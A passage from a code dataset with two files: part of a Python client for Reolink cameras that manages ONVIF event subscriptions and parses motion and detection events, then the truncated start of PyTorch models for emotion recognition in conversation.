remote.\"\"\"\n return remote_time.timestamp() - local_time.timestamp()\n\n async def get_digest(self) -> dict:\n \"\"\"Get the authorisation digest.\"\"\"\n time_created = datetime.utcnow().strftime(\"%Y-%m-%dT%H:%M:%S.000Z\")\n\n raw_nonce = uuid.uuid4().bytes\n nonce = base64.b64encode(raw_nonce)\n\n sha1 = hashlib.sha1()\n sha1.update(raw_nonce + time_created.encode(\"utf8\") + self._password.encode(\"utf8\"))\n raw_digest = sha1.digest()\n digest_pwd = base64.b64encode(raw_digest)\n\n return {\n \"UsernameToken\": str(uuid.uuid4()),\n \"Username\": self._username,\n \"PasswordDigest\": digest_pwd.decode(\"utf8\"),\n \"Nonce\": nonce.decode(\"utf8\"),\n \"Created\": time_created,\n }\n\n async def subscription_send(self, headers, data, timeout: aiohttp.ClientTimeout | None = None, mutex: asyncio.Lock | None = None) -> str:\n \"\"\"Send subscription data to the camera.\"\"\"\n if self._subscribe_url is None:\n await self.get_state(\"GetNetPort\")\n\n if self._subscribe_url is None:\n raise NotSupportedError(f\"subscription_send: failed to retrieve subscribe_url from {self._host}:{self._port}\")\n\n _LOGGER.debug(\n \"Host %s:%s: subscription request data:\\n%s\\n\",\n self._host,\n self._port,\n data,\n )\n\n if self._aiohttp_session.closed:\n self._aiohttp_session = self._get_aiohttp_session()\n\n if timeout is None:\n timeout = self._timeout\n if mutex is None:\n mutex = self._send_mutex\n\n try:\n async with mutex:\n response = await self._aiohttp_session.post(\n url=self._subscribe_url,\n data=data,\n headers=headers,\n allow_redirects=False,\n timeout=timeout,\n )\n\n response_text = await response.text()\n _LOGGER.debug(\n \"Host %s:%s: subscription got response status: %s. 
Payload:\\n%s\\n\",\n self._host,\n self._port,\n response.status,\n response_text,\n )\n\n if response.status != 200:\n if response.status == 400 and \"NotAuthorized\" in response_text and self.api_version(\"onvif\") <= 1:\n raise NotSupportedError(\n f\"Host {self._host}:{self._port}: subscription request got HTTP status response \"\n f\"{response.status}: {response.reason} with 'NotAuthorized' as response text\"\n )\n raise ApiError(f\"Host {self._host}:{self._port}: subscription request got a response with wrong HTTP status {response.status}: {response.reason}\")\n\n return response_text\n\n except (aiohttp.ClientConnectorError, aiohttp.ServerConnectionError) as err:\n raise ReolinkConnectionError(f\"Host {self._host}:{self._port}: connection error: {str(err)}.\") from err\n except asyncio.TimeoutError as err:\n raise ReolinkTimeoutError(f\"Host {self._host}:{self._port}: connection timeout exception.\") from err\n\n async def subscribe(self, webhook_url: str | None = None, sub_type: Literal[SubType.push, SubType.long_poll] = SubType.push, retry: bool = False):\n \"\"\"Subscribe to ONVIF events.\"\"\"\n headers = templates.HEADERS\n if sub_type == SubType.push:\n headers.update(templates.SUBSCRIBE_ACTION)\n template = templates.SUBSCRIBE_XML\n elif sub_type == SubType.long_poll:\n headers.update(templates.PULLPOINT_ACTION)\n template = templates.PULLPOINT_XML\n\n parameters = {\n \"InitialTerminationTime\": f\"PT{SUBSCRIPTION_TERMINATION_TIME}M\",\n }\n if webhook_url is not None and sub_type == SubType.push:\n parameters[\"Address\"] = webhook_url\n\n parameters.update(await self.get_digest())\n local_time = datetime.utcnow()\n\n xml = template.format(**parameters)\n\n try:\n response = await self.subscription_send(headers, xml)\n except NotSupportedError as err:\n raise err\n except ReolinkError as err:\n if not retry:\n _LOGGER.debug(\"Reolink %s subscribe error: %s\", sub_type, str(err))\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}: {str(err)}\") from err\n root = XML.fromstring(response)\n\n address_element = root.find(\".//{http://www.w3.org/2005/08/addressing}Address\")\n if address_element is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, could not find subscription manager url\")\n sub_manager_url = address_element.text\n\n if sub_manager_url is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, subscription manager url not available\")\n self._subscription_manager_url[sub_type] = sub_manager_url\n\n current_time_element = root.find(\".//{http://docs.oasis-open.org/wsn/b-2}CurrentTime\")\n if current_time_element is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, could not find CurrentTime\")\n remote_time = self.convert_time(current_time_element.text)\n\n if remote_time is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise 
SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, CurrentTime not available\")\n\n self._subscription_time_difference[sub_type] = await self.calc_time_difference(local_time, remote_time)\n\n termination_time_element = root.find(\".//{http://docs.oasis-open.org/wsn/b-2}TerminationTime\")\n if termination_time_element is None:\n if not retry:\n await self.unsubscribe_all(sub_type)\n return await self.subscribe(webhook_url, sub_type, retry=True)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, could not find TerminationTime\")\n\n termination_time = self.convert_time(termination_time_element.text)\n if termination_time is None:\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to subscribe {sub_type}, TerminationTime not available\")\n\n self._subscription_termination_time[sub_type] = termination_time - timedelta(seconds=self._subscription_time_difference[sub_type])\n\n _LOGGER.debug(\n \"%s, local time: %s, camera time: %s (difference: %s), termination time: %s\",\n sub_type,\n local_time.strftime(\"%Y-%m-%d %H:%M\"),\n remote_time.strftime(\"%Y-%m-%d %H:%M\"),\n self._subscription_time_difference[sub_type],\n self._subscription_termination_time[sub_type].strftime(\"%Y-%m-%d %H:%M\"),\n )\n\n return\n\n async def renew(self, sub_type: Literal[SubType.push, SubType.long_poll] = SubType.push):\n \"\"\"Renew the ONVIF event subscription.\"\"\"\n if not self.subscribed(sub_type):\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, not previously subscribed\")\n\n headers = templates.HEADERS\n headers.update(templates.RENEW_ACTION)\n template = templates.RENEW_XML\n\n parameters = {\n \"To\": self._subscription_manager_url[sub_type],\n \"TerminationTime\": f\"PT{SUBSCRIPTION_TERMINATION_TIME}M\",\n }\n\n parameters.update(await self.get_digest())\n local_time = datetime.utcnow()\n\n xml = template.format(**parameters)\n\n try:\n response = await self.subscription_send(headers, xml)\n except ReolinkError as err:\n await self.unsubscribe_all(sub_type)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription: {str(err)}\") from err\n root = XML.fromstring(response)\n\n current_time_element = root.find(\".//{http://docs.oasis-open.org/wsn/b-2}CurrentTime\")\n if current_time_element is None:\n await self.unsubscribe_all(sub_type)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, could not find CurrentTime\")\n remote_time = self.convert_time(current_time_element.text)\n\n if remote_time is None:\n await self.unsubscribe_all(sub_type)\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, CurrentTime not available\")\n\n self._subscription_time_difference[sub_type] = await self.calc_time_difference(local_time, remote_time)\n\n # The Reolink renew functionality has a bug: it always returns the INITIAL TerminationTime.\n # By adding the duration to the CurrentTime parameter, the new termination time can be calculated.\n # This will not work before the Reolink bug gets fixed on all devices\n # termination_time_element = root.find('.//{http://docs.oasis-open.org/wsn/b-2}TerminationTime')\n # if termination_time_element is None:\n # await self.unsubscribe_all(sub_type)\n # raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, unexpected response\")\n # remote_termination_time 
= self.convert_time(termination_time_element.text)\n # if remote_termination_time is None:\n # await self.unsubscribe_all(sub_type)\n # raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to renew {sub_type} subscription, unexpected response\")\n # self._subscription_termination_time[sub_type] = remote_termination_time - timedelta(seconds = self._subscription_time_difference[sub_type])\n self._subscription_termination_time[sub_type] = local_time + timedelta(minutes=SUBSCRIPTION_TERMINATION_TIME)\n\n _LOGGER.debug(\n \"Renewed subscription successfully, local time: %s, camera time: %s (difference: %s), termination time: %s\",\n local_time.strftime(\"%Y-%m-%d %H:%M\"),\n remote_time.strftime(\"%Y-%m-%d %H:%M\"),\n self._subscription_time_difference[sub_type],\n self._subscription_termination_time[sub_type].strftime(\"%Y-%m-%d %H:%M\"),\n )\n\n return\n\n async def pull_point_request(self):\n \"\"\"Request message from ONVIF pull point.\"\"\"\n if not self.subscribed(SubType.long_poll):\n raise SubscriptionError(f\"Host {self._host}:{self._port}: failed to request pull point message, not yet subscribed\")\n\n headers = templates.HEADERS\n headers.update(templates.PULLMESSAGE_ACTION)\n template = templates.PULLMESSAGE_XML\n\n parameters = {\n \"To\": self._subscription_manager_url[SubType.long_poll],\n \"Timeout\": f\"PT{LONG_POLL_TIMEOUT}M\",\n }\n parameters.update(await self.get_digest())\n\n xml = template.format(**parameters)\n _LOGGER.debug(\"Reolink %s requesting ONVIF pull point message\", self.nvr_name)\n\n timeout = aiohttp.ClientTimeout(total=LONG_POLL_TIMEOUT * 60 + 30, connect=self.timeout)\n\n try:\n response = await self.subscription_send(headers, xml, timeout, mutex=self._long_poll_mutex)\n except ReolinkError as err:\n raise SubscriptionError(f\"Failed to request pull point message: {str(err)}\") from err\n\n root = XML.fromstring(response)\n if root.find(\".//{http://docs.oasis-open.org/wsn/b-2}NotificationMessage\") is None:\n _LOGGER.debug(\"Reolink %s received ONVIF pull point message without event\", self.nvr_name)\n return []\n\n _LOGGER.info(\"Reolink %s received ONVIF pull point event\", self.nvr_name)\n\n return await self.ONVIF_event_callback(response, root)\n\n async def unsubscribe(self, sub_type: SubType = SubType.all):\n \"\"\"Unsubscribe from ONVIF events.\"\"\"\n if sub_type == SubType.all:\n await self.unsubscribe(SubType.push)\n await self.unsubscribe(SubType.long_poll)\n return\n\n if sub_type in self._subscription_manager_url:\n headers = templates.HEADERS\n headers.update(templates.UNSUBSCRIBE_ACTION)\n template = templates.UNSUBSCRIBE_XML\n\n parameters = {\"To\": self._subscription_manager_url[sub_type]}\n parameters.update(await self.get_digest())\n\n xml = template.format(**parameters)\n\n try:\n await self.subscription_send(headers, xml)\n except ReolinkError as err:\n _LOGGER.error(\"Error while unsubscribing %s: %s\", sub_type, str(err))\n\n self._subscription_manager_url.pop(sub_type, None)\n\n self._subscription_termination_time.pop(sub_type, None)\n self._subscription_time_difference.pop(sub_type, None)\n return\n\n async def unsubscribe_all(self, sub_type: SubType = SubType.all):\n \"\"\"Unsubscribe from ONVIF events. 
Normally only needed during entry initialization/setup, to free possibly dangling subscriptions.\"\"\"\n await self.unsubscribe(sub_type)\n\n if self._is_nvr and sub_type in [SubType.push, SubType.all]:\n _LOGGER.debug(\"Attempting to unsubscribe previous (dead) sessions notifications...\")\n\n headers = templates.HEADERS\n headers.update(templates.UNSUBSCRIBE_ACTION)\n template = templates.UNSUBSCRIBE_XML\n\n # These work for RLN8-410 NVR, so up to 3 maximum subscriptions on it\n for idx in range(0, 3):\n parameters = {\"To\": f\"http://{self._host}:{self._onvif_port}/onvif/Notification?Idx=00_{idx}\"}\n parameters.update(await self.get_digest())\n xml = template.format(**parameters)\n try:\n await self.subscription_send(headers, xml)\n except ReolinkError as err:\n _LOGGER.debug(\"Expected error from unsubscribing all: %s\", str(err))\n\n return True\n\n async def ONVIF_event_callback(self, data: str, root: XML.Element | None = None) -> list[int] | None:\n \"\"\"Handle incoming ONVIF event from the webhook called by the Reolink device.\"\"\"\n _LOGGER_DATA.debug(\"ONVIF event callback from '%s' received payload:\\n%s\", self.nvr_name, data)\n\n event_channels: list[int] = []\n contains_channels = False\n\n sub_type: Literal[SubType.push, SubType.long_poll]\n if root is None:\n sub_type = SubType.push\n root = XML.fromstring(data)\n else:\n sub_type = SubType.long_poll\n for message in root.iter(\"{http://docs.oasis-open.org/wsn/b-2}NotificationMessage\"):\n channel = None\n\n # find NotificationMessage Rule (type of event)\n topic_element = message.find(\"{http://docs.oasis-open.org/wsn/b-2}Topic[@Dialect='http://www.onvif.org/ver10/tev/topicExpression/ConcreteSet']\")\n if topic_element is None or topic_element.text is None:\n continue\n rule = basename(topic_element.text)\n if not rule:\n continue\n\n # find camera channel\n if self.num_cameras == 1:\n channel = self.channels[0]\n else:\n source_element = message.find(\".//{http://www.onvif.org/ver10/schema}SimpleItem[@Name='Source']\")\n if source_element is None:\n source_element = message.find(\".//{http://www.onvif.org/ver10/schema}SimpleItem[@Name='VideoSourceConfigurationToken']\")\n if source_element is not None and \"Value\" in source_element.attrib:\n try:\n channel = int(source_element.attrib[\"Value\"])\n except ValueError:\n if f\"ONVIF_{rule}_invalid_channel\" not in self._log_once:\n self._log_once.append(f\"ONVIF_{rule}_invalid_channel\")\n _LOGGER.warning(\"Reolink ONVIF event '%s' data contained invalid channel '%s', issuing poll instead\", rule, source_element.attrib[\"Value\"])\n\n if channel is None:\n # Unknown which channel caused the event, poll all channels\n if f\"ONVIF_{rule}_no_channel\" not in self._log_once:\n self._log_once.append(f\"ONVIF_{rule}_no_channel\")\n _LOGGER.warning(\"Reolink ONVIF event '%s' does not contain channel\", rule)\n if not await self.get_motion_state_all_ch():\n _LOGGER.error(\"Could not poll motion state after receiving ONVIF event with unknown channel\")\n return None\n\n if channel not in self.channels:\n # Channel has no camera connected, ignoring this notification\n contains_channels = True\n continue\n\n key = \"State\"\n if rule == \"Motion\":\n key = \"IsMotion\"\n data_element = message.find(f\".//\\u007bhttp://www.onvif.org/ver10/schema\\u007dSimpleItem[@Name='{key}']\")\n if data_element is None or \"Value\" not in data_element.attrib:\n if f\"ONVIF_{rule}_no_data\" not in self._log_once:\n self._log_once.append(f\"ONVIF_{rule}_no_data\")\n _LOGGER.warning(\"ONVIF event 
'%s' did not contain data:\\n%s\", rule, data)\n continue\n\n if rule not in [\"Motion\", \"MotionAlarm\", \"FaceDetect\", \"PeopleDetect\", \"VehicleDetect\", \"DogCatDetect\", \"Visitor\"]:\n if f\"ONVIF_unknown_{rule}\" not in self._log_once:\n self._log_once.append(f\"ONVIF_unknown_{rule}\")\n _LOGGER.warning(\"ONVIF event with unknown rule: '%s'\", rule)\n continue\n\n if channel not in event_channels:\n event_channels.append(channel)\n if rule in [\"FaceDetect\", \"PeopleDetect\", \"VehicleDetect\", \"DogCatDetect\", \"Visitor\"]:\n self._onvif_only_motion[sub_type] = False\n\n state = data_element.attrib[\"Value\"] == \"true\"\n _LOGGER.info(\"Reolink %s ONVIF event channel %s, %s: %s\", self.nvr_name, channel, rule, state)\n\n if rule == \"Motion\":\n self._motion_detection_states[channel] = state\n elif rule == \"MotionAlarm\":\n self._motion_detection_states[channel] = state\n elif rule == \"FaceDetect\":\n self._ai_detection_states[channel][\"face\"] = state\n elif rule == \"PeopleDetect\":\n self._ai_detection_states[channel][\"people\"] = state\n elif rule == \"VehicleDetect\":\n self._ai_detection_states[channel][\"vehicle\"] = state\n elif rule == \"DogCatDetect\":\n self._ai_detection_states[channel][\"dog_cat\"] = state\n elif rule == \"Visitor\":\n self._visitor_states[channel] = state\n\n if not event_channels and not contains_channels:\n # ONVIF notification withouth known events\n if \"ONVIF_no_known\" not in self._log_once:\n self._log_once.append(\"ONVIF_no_known\")\n _LOGGER.warning(\"Reolink ONVIF notification received withouth any known events:\\n%s\", data)\n if not await self.get_motion_state_all_ch():\n _LOGGER.error(\"Could not poll motion state after receiving ONVIF event without any known events\")\n return None\n\n if self._onvif_only_motion[sub_type] and any(self.ai_supported(ch) for ch in event_channels):\n # Poll all other states since not all cameras have rich notifications including the specific events\n if f\"ONVIF_only_motion_{sub_type}\" not in self._log_once:\n self._log_once.append(f\"ONVIF_only_motion_{sub_type}\")\n _LOGGER.debug(\"Reolink model '%s' appears to not support rich notifications for %s\", self.model, sub_type)\n if not await self.get_ai_state_all_ch():\n _LOGGER.error(\"Could not poll AI event state after receiving ONVIF event with only motion event\")\n return None\n\n return event_channels\n","repo_name":"starkillerOG/reolink_aio","sub_path":"reolink_aio/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":199070,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"78"} +{"seq_id":"27346068537","text":"import torch\r\nfrom torch import nn\r\nfrom torch.nn import LSTM\r\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\r\nimport config\r\nimport torch.nn.functional as F\r\n\r\nclass BLSTMClass(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.dropout = nn.Dropout(0.5)\r\n self.lstm = LSTM(input_size=config.input_dim,\r\n hidden_size=config.hidden_dim // 2,\r\n num_layers=1,\r\n bidirectional=True,\r\n batch_first=True)\r\n self.clf = nn.Linear(config.hidden_dim, config.nclass)\r\n\r\n def forward(self, x, adj, a, b, c):\r\n x = self.lstm(x)[0]\r\n x = self.dropout(x)\r\n return self.clf(x)\r\n\r\ndef mask_logic(alpha, adj):\r\n '''\r\n performing mask logic with adj\r\n :param alpha:\r\n :param adj:\r\n :return:\r\n '''\r\n return alpha - (1 - adj) * 1e30\r\n\r\nclass GatDot(nn.Module):\r\n def __init__(self, hidden_size):\r\n 
super().__init__()\r\n self.linear1 = nn.Linear(hidden_size, hidden_size)\r\n self.linear2 = nn.Linear(hidden_size, hidden_size)\r\n\r\n def forward(self, Q, K, V, adj, s_mask):\r\n '''\r\n imformation gatherer with dot product attention\r\n :param Q: (B, D) # query utterance\r\n :param K: (B, N, D) # context\r\n :param V: (B, N, D) # context\r\n :param adj: (B, N) # the adj matrix of the i th node\r\n :return:\r\n '''\r\n N = K.size()[1]\r\n Q = self.linear1(Q).unsqueeze(2) # (B,D,1)\r\n # K = self.linear2(Q) # (B, N, D)\r\n K = self.linear2(K) # (B, N, D)\r\n alpha = torch.bmm(K, Q).permute(0, 2, 1) # (B, 1, N)\r\n adj = adj.unsqueeze(1)\r\n alpha = mask_logic(alpha, adj) # (B, 1, N)\r\n attn_weight = F.softmax(alpha, dim=2) # (B, 1, N)\r\n attn_sum = torch.bmm(attn_weight, V).squeeze(1) # (B, D)\r\n return attn_weight, attn_sum\r\n\r\nclass GatDot_rel(nn.Module):\r\n def __init__(self, hidden_size):\r\n super().__init__()\r\n self.linear1 = nn.Linear(hidden_size, hidden_size)\r\n self.linear2 = nn.Linear(hidden_size, hidden_size)\r\n self.linear3 = nn.Linear(hidden_size, 1)\r\n self.rel_emb = nn.Embedding(2, hidden_size)\r\n\r\n def forward(self, Q, K, V, adj, s_mask):\r\n '''\r\n imformation gatherer with dot product attention\r\n :param Q: (B, D) # query utterance\r\n :param K: (B, N, D) # context\r\n :param V: (B, N, D) # context\r\n :param adj: (B, N) # the adj matrix of the i th node\r\n :param s_mask: (B, N) # relation mask\r\n :return:\r\n '''\r\n N = K.size()[1]\r\n rel_emb = self.rel_emb(s_mask)\r\n Q = self.linear1(Q).unsqueeze(2) # (B,D,1)\r\n K = self.linear2(K) # (B, N, D)\r\n y = self.linear3(rel_emb) # (B, N, 1\r\n alpha = (torch.bmm(K, Q) + y).permute(0, 2, 1) # (B, 1, N)\r\n adj = adj.unsqueeze(1) # adj-> [B,1,i]\r\n alpha = mask_logic(alpha, adj) # (B, 1, N)\r\n attn_weight = F.softmax(alpha, dim=2) # (B, 1, N)\r\n attn_sum = torch.bmm(attn_weight, V).squeeze(1) # (B, D)\r\n return attn_weight, attn_sum\r\n\r\nclass DAGERC(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.dropout = nn.Dropout(0.1)\r\n self.fc1 = nn.Linear(config.input_dim, config.hidden_dim)\r\n self.fc2 = nn.Linear(config.input_dim, config.hidden_dim)\r\n gats1 = []\r\n for _ in range(config.layers):\r\n gats1 += [GatDot(config.hidden_dim)]\r\n self.gather1 = nn.ModuleList(gats1)\r\n grus = []\r\n linears = []\r\n for _ in range(config.layers):\r\n grus += [nn.GRUCell(config.hidden_dim, config.hidden_dim)]\r\n linears += [nn.Linear(config.hidden_dim*2, config.hidden_dim)]\r\n self.grus = nn.ModuleList(grus)\r\n self.linears = nn.ModuleList(linears)\r\n # for out put\r\n in_dim = config.hidden_dim * (config.layers + 1) + config.input_dim\r\n # output mlp layers\r\n layers = [nn.Linear(in_dim, config.hidden_dim), nn.ReLU()]\r\n for _ in range(config.layers - 1):\r\n layers += [nn.Linear(config.hidden_dim, config.hidden_dim), nn.ReLU()]\r\n layers += [nn.Linear(config.hidden_dim, config.nclass)]\r\n self.out_mlp = nn.Sequential(*layers)\r\n\r\n def forward(self, x, adj, s_mask, s_feature, s_adj):\r\n '''\r\n :param x: feature B,N,D\r\n :param adj: B,N,N\r\n :param s_mask: B,N,N,2\r\n :param s_feature: B,M,D\r\n :param s_adj: B,M,N\r\n :return:\r\n '''\r\n num_utter = x.size()[1]\r\n H0 = F.relu(self.fc1(x)) # (B, N, D)\r\n s_feature = F.relu(self.fc2(s_feature)) # (B, M, D) # speaker features\r\n H = [H0]\r\n P = [s_feature]\r\n for l in range(config.layers):\r\n Mp = torch.bmm(s_adj.permute(0,2,1), P[l])\r\n H1 = self.grus[l](H[l][:, 0, :]).unsqueeze(1)\r\n for i in range(1, 
num_utter):\r\n _, M = self.gather1[l](H[l][:, i, :], H1, H1, adj[:, i, :i], s_mask)\r\n Mpi = Mp[:, i, :] # B,1,D\r\n M = torch.cat([M, Mpi], dim=-1)\r\n M = self.linears[l](M)\r\n H1 = torch.cat((H1, self.grus[l](H[l][:, i, :], M).unsqueeze(1)), dim=1)\r\n H1 = self.dropout(H1)\r\n H.append(H1)\r\n # update P from utterance\r\n P_l_1 = torch.bmm(s_adj, H1)\r\n Plm = []\r\n for m in range(P_l_1.shape[1]):\r\n Plm.append(self.grus[l](P[l][:, m, :], P_l_1[:, m, :]).unsqueeze(1))\r\n Pl = torch.cat(Plm, dim=1) # B,M,D\r\n P.append(Pl)\r\n H.append(x)\r\n H = torch.cat(H, dim=2) # (B, N, l*D)\r\n logits = self.out_mlp(H)\r\n return logits\r\n\r\nclass RGATLayer(nn.Module):\r\n \"\"\"\r\n Simple GAT layer, similar to https://arxiv.org/abs/1710.10903\r\n \"\"\"\r\n def __init__(self, input_dim, out_dim, dropout=0.1, alpha=0.1, concat=True):\r\n super(RGATLayer, self).__init__()\r\n self.dropout = dropout\r\n self.in_features = input_dim\r\n self.out_features = out_dim\r\n self.alpha = alpha\r\n self.concat = concat\r\n self.W = nn.Parameter(torch.zeros(size=(self.in_features, self.out_features))).cuda()\r\n nn.init.xavier_uniform_(self.W.data, gain=1.414)\r\n self.a = nn.Parameter(torch.zeros(size=(self.out_features*3, 1))).cuda()\r\n nn.init.xavier_uniform_(self.a.data, gain=1.414)\r\n\r\n self.leakyrelu = nn.LeakyReLU(self.alpha)\r\n self.rel_emb = nn.Embedding(2, config.hidden_dim)\r\n\r\n def forward(self, x, adj, s_mask):\r\n h = torch.matmul(x, self.W) # B,N,D\r\n N = h.size()[1] # nV=30\r\n batch = h.size()[0]\r\n h1 = h.repeat(1, 1, N).view(batch, N * N, -1)\r\n h2 = h.repeat(1, N, 1)\r\n r = self.rel_emb(s_mask).view(batch, N*N, -1)\r\n # attention with relation\r\n a_input = torch.cat([h1, h2, r], dim=2).view(batch, N, N, 3*self.out_features) # [B, N, N, 3D]\r\n # a_input = torch.cat([h1, h2]).view(batch, N, N, 2*self.out_features) # [B, N, N, 3D]\r\n e = self.leakyrelu(torch.matmul(a_input, self.a).squeeze(3)) # [128, 30, 30]\r\n zero_vec = -9e15 * torch.ones_like(e)\r\n attention = torch.where(adj > 0, e, zero_vec) # adj > 0 zero_vec\r\n attention = F.softmax(attention, dim=2) # [128, 30, 30]\r\n self.att = attention\r\n attention = F.dropout(attention, self.dropout, training=self.training)\r\n h_prime = torch.matmul(attention, h)\r\n if self.concat:\r\n return F.elu(h_prime)\r\n else:\r\n return h_prime\r\n\r\n def __repr__(self):\r\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\r\n\r\nclass GRU3d(nn.Module):\r\n def __init__(self, hidden = config.hidden_dim):\r\n super().__init__()\r\n self.hidden = hidden\r\n self.w_z = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.u_z = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.w_r = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.u_r = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.w = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.u = nn.Parameter(torch.Tensor(hidden, hidden))\r\n self.reset_parameters()\r\n\r\n def forward(self, x, c): #\r\n '''\r\n :param x: current hidden state (cat of p_l_1 and aggregation of RGAT) #B,N,D\r\n :param c: cell state(last hidden state) #B,N,2D\r\n :return:\r\n '''\r\n z = torch.sigmoid(torch.matmul(x, self.w_z) + torch.matmul(c, self.u_z))\r\n r = torch.sigmoid(torch.matmul(x, self.w_r) + torch.matmul(c, self.u_r))\r\n h_hat = torch.tanh(torch.matmul(x, self.w) + r*torch.matmul(c, self.u))\r\n return (1-z)*x + z*h_hat\r\n\r\n def reset_parameters(self):\r\n std = 0.1\r\n for weight in self.parameters():\r\n 
weight.data.normal_(mean=0.0, std=std) # 平均数为0方差为0.1的标准正态分布\r\n\r\nclass Scaled_Dot_Product_Attention(nn.Module):\r\n '''Scaled Dot-Product Attention '''\r\n def __init__(self):\r\n super(Scaled_Dot_Product_Attention, self).__init__()\r\n\r\n def forward(self, Q, K, V, scale=None):\r\n '''\r\n Args:\r\n Q: [batch_size, len_Q, dim_Q]\r\n K: [batch_size, len_K, dim_K]\r\n V: [batch_size, len_V, dim_V]\r\n scale:\r\n Return:\r\n self-attention\r\n '''\r\n attention = torch.matmul(Q, K.permute(0, 2, 1))\r\n if scale:\r\n attention = attention * scale\r\n attention = F.softmax(attention, dim=-1)\r\n context = torch.matmul(attention, V)\r\n return context\r\n\r\n\r\nclass Multi_Head_Attention(nn.Module):\r\n def __init__(self, dim_model, num_head=4):\r\n super(Multi_Head_Attention, self).__init__()\r\n self.num_head = num_head\r\n assert dim_model % num_head == 0\r\n self.dim_head = dim_model // self.num_head\r\n self.fc_V = nn.Linear(dim_model, num_head * self.dim_head)\r\n self.fc_K = nn.Linear(dim_model, num_head * self.dim_head)\r\n self.fc_Q = nn.Linear(dim_model, num_head * self.dim_head)\r\n self.attention = Scaled_Dot_Product_Attention()\r\n self.fc = nn.Linear(num_head * self.dim_head, dim_model)\r\n self.dropout = nn.Dropout(config.dropout)\r\n self.layer_norm = nn.LayerNorm(dim_model)\r\n\r\n def forward(self, x, K, Q):\r\n batch_size = x.size(0)\r\n V = self.fc_V(x)\r\n Q = self.fc_Q(Q)\r\n K = self.fc_K(K)\r\n Q = Q.view(batch_size * self.num_head, -1, self.dim_head)\r\n K = K.view(batch_size * self.num_head, -1, self.dim_head)\r\n V = V.view(batch_size * self.num_head, -1, self.dim_head)\r\n scale = K.size(-1) ** -0.5\r\n context = self.attention(Q, K, V, scale)\r\n context = context.view(batch_size, -1, self.dim_head * self.num_head)\r\n out = self.fc(context)\r\n # out = self.dropout(out)\r\n out = out + x\r\n out = self.layer_norm(out)\r\n return out\r\n\r\nclass PERC(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.dropout = nn.Dropout(config.dropout)\r\n # self.embedding = nn.Embedding(config.speaker_vocab, config.hidden_dim)\r\n self.fc1 = nn.Linear(config.input_dim, config.hidden_dim)\r\n self.fc2 = nn.Linear(config.input_dim, config.hidden_dim)\r\n gats = []\r\n for _ in range(config.layers):\r\n gats += [RGATLayer(config.hidden_dim, config.hidden_dim)]\r\n self.gather = nn.ModuleList(gats)\r\n grus, grus2 = [], []\r\n Aggs = []\r\n for _ in range(config.layers):\r\n grus += [GRU3d(config.hidden_dim)]\r\n if config.att_agg:\r\n Aggs += [Multi_Head_Attention(config.hidden_dim)]\r\n else:\r\n Aggs += [nn.Linear(config.hidden_dim*3, config.hidden_dim)]\r\n self.grus = nn.ModuleList(grus)\r\n self.agg = nn.ModuleList(Aggs)\r\n self.out_mlp = nn.Linear(config.hidden_dim, config.nclass)\r\n # self.layer_norm = nn.LayerNorm(config.hidden_dim)\r\n\r\n def forward(self, x, adj, s_mask, s_feature, s_adj, speaker_id):\r\n '''\r\n :param x: feature B,N,D\r\n :param adj: B,N,N\r\n :param s_mask: B,N,N,2\r\n :param s_feature: B,M,D\r\n :param s_adj: B,M,N\r\n :return:\r\n '''\r\n H0 = F.relu(self.fc1(x)) # (B, N, D)\r\n H0 = self.dropout(H0)\r\n H = [H0]\r\n if config.init_way == 'global':\r\n s_feature = F.relu(self.fc2(s_feature)) # (B, M, D) # speaker features\r\n if config.init_way == 'random':\r\n s_feature = F.relu(self.fc2(s_feature))\r\n s_feature = torch.rand_like(s_feature)\r\n if config.init_way == 'local':\r\n s_feature = torch.bmm(s_adj, x)\r\n s_feature = F.relu(self.fc2(s_feature))\r\n # if config.init_way == 'embed':\r\n # s_feature = 
